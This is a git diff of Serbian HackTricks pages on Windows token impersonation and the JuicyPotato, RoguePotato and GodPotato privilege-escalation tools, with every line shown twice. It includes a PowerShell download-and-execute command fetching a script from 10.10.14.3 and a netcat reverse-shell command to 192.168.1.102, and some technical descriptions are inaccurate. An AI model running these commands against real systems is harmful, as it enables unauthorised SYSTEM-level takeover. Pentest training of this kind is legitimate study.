Možete pokrenuti proces koji **koristi različite akreditive za pristup mrežnim uslugama** koristeći:
|
||||
```
|
||||
runas /user:domain\username /netonly cmd.exe
|
||||
```
|
||||
Ovo je korisno ako imate korisne akreditive za pristup objektima u mreži, ali ti akreditivi nisu važeći unutar trenutnog računara jer će se koristiti samo u mreži (u trenutnom računaru će se koristiti vaši trenutni korisnički privilegiji).
|
||||
Ovo je korisno ako imate korisne akreditive za pristup objektima u mreži, ali ti akreditivi nisu važeći unutar trenutnog hosta jer će se koristiti samo u mreži (u trenutnom hostu će se koristiti vaše trenutne korisničke privilegije).
|
||||
|
||||
### Vrste tokena
|
||||
|
||||
Postoje dva tipa dostupnih tokena:
|
||||
|
||||
* **Primarni token**: Služi kao reprezentacija sigurnosnih akreditiva procesa. Kreiranje i povezivanje primarnih tokena sa procesima su radnje koje zahtevaju povišene privilegije, ističući princip razdvajanja privilegija. Tipično, servis za autentifikaciju je odgovoran za kreiranje tokena, dok servis za prijavljivanje upravlja njegovim povezivanjem sa korisnikovim operativnim sistemom. Važno je napomenuti da procesi nasleđuju primarni token svog roditeljskog procesa pri kreiranju.
|
||||
* **Token za personifikaciju**: Omogućava serverskoj aplikaciji da privremeno preuzme identitet klijenta radi pristupa sigurnim objektima. Ovaj mehanizam je slojevito podeljen na četiri nivoa operacija:
|
||||
* **Primarni token**: Služi kao reprezentacija sigurnosnih akreditiva procesa. Kreiranje i povezivanje primarnih tokena sa procesima su radnje koje zahtevaju povišene privilegije, naglašavajući princip razdvajanja privilegija. Tipično, servis za autentifikaciju je odgovoran za kreiranje tokena, dok servis za prijavljivanje upravlja njegovim povezivanjem sa korisnikovim operativnim sistemom. Važno je napomenuti da procesi nasleđuju primarni token svog roditeljskog procesa prilikom kreiranja.
|
||||
* **Token za oponašanje**: Omogućava serverskoj aplikaciji da privremeno preuzme identitet klijenta radi pristupa sigurnim objektima. Ovaj mehanizam je stratifikovan u četiri nivoa operacija:
|
||||
* **Anoniman**: Dodeljuje pristup serveru sličan pristupu nepoznatog korisnika.
|
||||
* **Identifikacija**: Omogućava serveru da proveri identitet klijenta bez korišćenja za pristup objektima.
|
||||
* **Personifikacija**: Omogućava serveru da radi pod identitetom klijenta.
|
||||
* **Delegacija**: Slično kao Personifikacija, ali uključuje mogućnost proširenja ovog pretpostavljanja identiteta na udaljene sisteme sa kojima server interaguje, obezbeđujući očuvanje akreditiva.
|
||||
* **Oponašanje**: Omogućava serveru da radi pod identitetom klijenta.
|
||||
* **Delegacija**: Slično oponašanju, ali uključuje mogućnost proširenja ovog pretpostavljanja identiteta na udaljene sisteme sa kojima server interaguje, obezbeđujući očuvanje akreditiva.
|
||||
|
||||
#### Personifikacija tokena
|
||||
#### Oponašanje tokena
|
||||
|
||||
Korišćenjem _**incognito**_ modula metasploita, ako imate dovoljno privilegija, možete lako **listati** i **personifikovati** druge **tokene**. Ovo može biti korisno za izvođenje **akcija kao da ste drugi korisnik**. Takođe možete **povišiti privilegije** ovom tehnikom.
|
||||
Korišćenjem modula _**incognito**_ u metasploit-u, ako imate dovoljno privilegija, možete lako **izlistati** i **oponašati** druge **tokene**. Ovo može biti korisno za izvođenje **akcija kao da ste drugi korisnik**. Takođe možete **povišiti privilegije** ovom tehnikom.
|
||||
|
||||
### Privilegije tokena
|
||||
|
||||
Saznajte koje **privilegije tokena mogu biti zloupotrebljene radi povišenja privilegija:**
|
||||
Saznajte koje **privilegije tokena mogu biti zloupotrebljene za povišenje privilegija:**
|
||||
|
||||
{% content-ref url="privilege-escalation-abusing-tokens.md" %}
|
||||
[privilege-escalation-abusing-tokens.md](privilege-escalation-abusing-tokens.md)
|
||||
|
@ -122,15 +122,15 @@ Pogledajte [**sve moguće privilegije tokena i neke definicije na ovoj spoljnoj
|
|||
Saznajte više o tokenima u ovim tutorijalima: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) i [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji kradu informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera koji krade informacije**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji kradu informacije.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -138,10 +138,10 @@ Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplat
|
|||
|
||||
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li videti svoju **kompaniju reklamiranu na HackTricks**? ili želite imati pristup **najnovijoj verziji PEASS ili preuzeti HackTricks u PDF formatu**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite da imate pristup **najnovijoj verziji PEASS ili preuzmete HackTricks u PDF-u**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grupi**](https://discord.gg/hRep4RUj7f) ili **telegram grupi** ili me **pratite** na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **i** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **i** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
# JuicyPotato
|
||||
# Sočna krompira
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite da imate pristup **najnovijoj verziji PEASS ili preuzmete HackTricks u PDF formatu**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite da imate pristup **najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF formatu**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grupi** ili **telegram grupi** ili me **pratite** na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
@ -12,15 +12,15 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač na **dark vebu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -34,47 +34,47 @@ Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno
|
|||
[roguepotato-and-printspoofer.md](roguepotato-and-printspoofer.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Juicy Potato (zloupotreba zlatnih privilegija) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
|
||||
## Sočni krompir (zloupotreba zlatnih privilegija) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
|
||||
|
||||
_Šećerana verzija_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, sa malo soka, tj. **još jedan alat za lokalno eskaliranje privilegija, od Windows servisnih naloga do NT AUTHORITY\SYSTEM**_
|
||||
_Šećerom prekrivena verzija_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, sa malo soka, tj. **još jedan alat za lokalno eskaliranje privilegija, od Windows servisnih naloga do NT AUTHORITY\SYSTEM**_
|
||||
|
||||
#### Možete preuzeti JuicyPotato sa [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
|
||||
#### Možete preuzeti sočni krompir sa [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
|
||||
|
||||
### Rezime <a href="#summary" id="summary"></a>
|
||||
|
||||
[**Iz Juicy-Potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
|
||||
[**Iz sočnog krompira Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
|
||||
|
||||
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) i njegovi [varijanti](https://github.com/decoder-it/lonelypotato) iskorišćavaju lanac eskalacije privilegija zasnovan na [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [servisu](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) sa MiTM slušaocem na `127.0.0.1:6666` i kada imate privilegije `SeImpersonate` ili `SeAssignPrimaryToken`. Tokom pregleda Windows build-a, otkrili smo postavku gde je `BITS` namerno onemogućen i port `6666` je zauzet.
|
||||
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) i njegovi [varijanti](https://github.com/decoder-it/lonelypotato) iskorišćavaju lanac eskalacije privilegija zasnovan na [`BITS`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799\(v=vs.85\).aspx) [servisu](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) koji ima MiTM slušaoca na `127.0.0.1:6666` i kada imate privilegije `SeImpersonate` ili `SeAssignPrimaryToken`. Tokom pregleda Windows izgradnje otkrili smo postavku gde je `BITS` namerno onemogućen i port `6666` je zauzet.
|
||||
|
||||
Odlučili smo da oružamo [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Pozdravite Juicy Potato**.
|
||||
Odlučili smo da oružamo [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Pozdravite Sočni Krompir**.
|
||||
|
||||
> Za teoriju, pogledajte [Rotten Potato - Eskalacija privilegija od servisnih naloga do SYSTEM-a](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) i pratite lanac veza i referenci.
|
||||
> Za teoriju, pogledajte [Rotten Krompir - Eskalacija privilegija od servisnih naloga do SISTEMA](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) i pratite lanac veza i referenci.
|
||||
|
||||
Otkrili smo da, osim `BITS`, postoji nekoliko COM servera koje možemo zloupotrebiti. Samo treba da:
|
||||
Otkrili smo da, osim `BITS`-a, postoji nekoliko COM servera koje možemo zloupotrebiti. Samo treba da:
|
||||
|
||||
1. budu instancirani od strane trenutnog korisnika, obično "servisnog korisnika" koji ima privilegije impersonacije
|
||||
2. implementiraju `IMarshal` interfejs
|
||||
3. pokreću se kao privilegovan korisnik (SYSTEM, Administrator, …)
|
||||
3. pokreću se kao privilegovan korisnik (SISTEM, Administrator, …)
|
||||
|
||||
Nakon nekih testiranja, dobili smo i testirali obimnu listu [interesantnih CLSID-ova](http://ohpe.it/juicy-potato/CLSID/) na nekoliko verzija Windows-a.
|
||||
Nakon nekih testiranja dobili smo i testirali obimnu listu [interesantnih CLSID-ova](http://ohpe.it/juicy-potato/CLSID/) na nekoliko verzija Windowsa.
|
||||
|
||||
### Detalji o JuicyPotato-u <a href="#juicy-details" id="juicy-details"></a>
|
||||
### Sočni detalji <a href="#juicy-details" id="juicy-details"></a>
|
||||
|
||||
JuicyPotato vam omogućava da:
|
||||
Sočni krompir vam omogućava da:
|
||||
|
||||
* **Ciljajte CLSID** _izaberite bilo koji CLSID koji želite._ [_Ovde_](http://ohpe.it/juicy-potato/CLSID/) _možete pronaći listu organizovanu po OS-u._
|
||||
* **COM port za slušanje** _definišite COM port za slušanje koji preferirate (umesto marshalled hardkodiranog 6666)_
|
||||
* **IP adresa za slušanje COM-a** _vezujte server na bilo koju IP adresu_
|
||||
* **COM slušajući port** _definišite COM slušajući port koji preferirate (umesto marshalled hardkodiranog 6666)_
|
||||
* **COM slušajuća IP adresa** _vezujte server na bilo koju IP adresu_
|
||||
* **Režim kreiranja procesa** _u zavisnosti od privilegija impersoniranog korisnika možete birati između:_
|
||||
* `CreateProcessWithToken` (potrebno je `SeImpersonate`)
|
||||
* `CreateProcessAsUser` (potrebno je `SeAssignPrimaryToken`)
|
||||
* `oba`
|
||||
* **Proces za pokretanje** _pokrenite izvršnu datoteku ili skriptu ako iskorišćavanje uspe_
|
||||
* **Argument procesa** _prilagodite argumente pokrenutog procesa_
|
||||
* **Adresa RPC servera** _za prikriveni pristup možete se autentifikovati na eksterni RPC server_
|
||||
* **Port RPC servera** _korisno ako želite da se autentifikujete na eksterni server, a firewall blokira port `135`…_
|
||||
* **RPC Server adresa** _za prikriveni pristup možete se autentifikovati na spoljni RPC server_
|
||||
* **RPC Server port** _korisno ako želite da se autentifikujete na spoljni server a firewall blokira port `135`…_
|
||||
* **TEST režim** _pretežno za testiranje, tj. testiranje CLSID-ova. Kreira DCOM i ispisuje korisnika tokena. Pogledajte_ [_ovde za testiranje_](http://ohpe.it/juicy-potato/Test/)
|
||||
### Upotreba <a href="#upotreba" id="upotreba"></a>
|
||||
### Upotreba <a href="#usage" id="usage"></a>
|
||||
```
|
||||
T:\>JuicyPotato.exe
|
||||
JuicyPotato v0.1
|
||||
|
@ -101,7 +101,7 @@ Gotovo je nemoguće sprečiti zloupotrebu svih ovih COM servera. Možete razmisl
|
|||
|
||||
Stvarno rešenje je zaštita osetljivih naloga i aplikacija koje se izvršavaju pod nalozima `* SERVICE`. Zaustavljanje `DCOM` bi svakako sprečilo ovu eksploataciju, ali bi moglo imati ozbiljan uticaj na osnovni OS.
|
||||
|
||||
Izvor: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
|
||||
Od: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
|
||||
|
||||
## Primeri
|
||||
|
||||
|
@ -120,6 +120,8 @@ Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
|
|||
|
||||
c:\Users\Public>
|
||||
```
|
||||
### Powershell rev
|
||||
|
||||
### Powershell rev
|
||||
```
|
||||
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
|
||||
|
@ -148,15 +150,15 @@ Zatim preuzmite [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/mas
|
|||
|
||||
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -167,7 +169,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
* Da li radite u **kompaniji za kibernetičku bezbednost**? Želite li da vidite svoju **kompaniju reklamiranu na HackTricks**? ili želite pristup **najnovijoj verziji PEASS-a ili preuzimanje HackTricks-a u PDF-u**? Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grupi**](https://discord.gg/hRep4RUj7f) ili **telegram grupi** ili me **pratite** na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Pridružite se** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grupi**](https://discord.gg/hRep4RUj7f) ili **telegram grupi**](https://t.me/peass) ili me **pratite** na **Twitteru** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova u** [**repozitorijum hacktricks**](https://github.com/carlospolop/hacktricks) **i** [**repozitorijum hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,22 +14,22 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
|
||||
Njihov primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
{% hint style="warning" %}
|
||||
**JuicyPotato ne radi** na Windows Serveru 2019 i Windows 10 verziji 1809 i novijim. Međutim, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) mogu se koristiti za **iskorišćavanje istih privilegija i dobijanje pristupa na nivou `NT AUTHORITY\SYSTEM`**. Ovaj [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) detaljno objašnjava alat `PrintSpoofer`, koji se može koristiti za zloupotrebu privilegija impersonacije na Windows 10 i Server 2019 hostovima gde JuicyPotato više ne radi.
|
||||
**JuicyPotato ne radi** na Windows Serveru 2019 i Windows 10 verziji 1809 i novijim. Međutim, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) mogu se koristiti za **iskorišćavanje istih privilegija i dobijanje pristupa na nivou `NT AUTHORITY\SYSTEM`**. Ovaj [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) detaljno opisuje alat `PrintSpoofer`, koji se može koristiti za zloupotrebu privilegija impersonacije na Windows 10 i Server 2019 hostovima gde JuicyPotato više ne radi.
|
||||
{% endhint %}
|
||||
|
||||
## Brza Demonstracija
|
||||
|
@ -80,7 +80,7 @@ nt authority\system
|
|||
```
|
||||
### RoguePotato
|
||||
|
||||
RoguePotato je tehnika lokalnog eskaliranja privilegija koja iskorišćava ranjivosti u Windows Print Spooler servisu. Ova tehnika omogućava napadaču da dobije SYSTEM privilegije na kompromitovanom sistemu. RoguePotato koristi PrintSpoofer alat koji je deo od PrintNightmare ranjivosti.
|
||||
RoguePotato je kombinacija dve poznate tehnike eskalacije privilegija: **PrintSpoofer** i **Juicy Potato**. Ova tehnika iskorišćava ranjivosti u Windows Print Spooler servisu kako bi se postigla eskalacija privilegija. Kombinovanjem ove dve tehnike, napadač može da izvrši proizvoljan kod sa SYSTEM privilegijama na ranjivom sistemu.
|
||||
```
|
||||
GodPotato -cmd "cmd /c whoami"
|
||||
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
||||
|
@ -92,15 +92,15 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
|||
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
||||
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji kradu informacije**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji kradu informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
|
Loading…
Reference in a new issue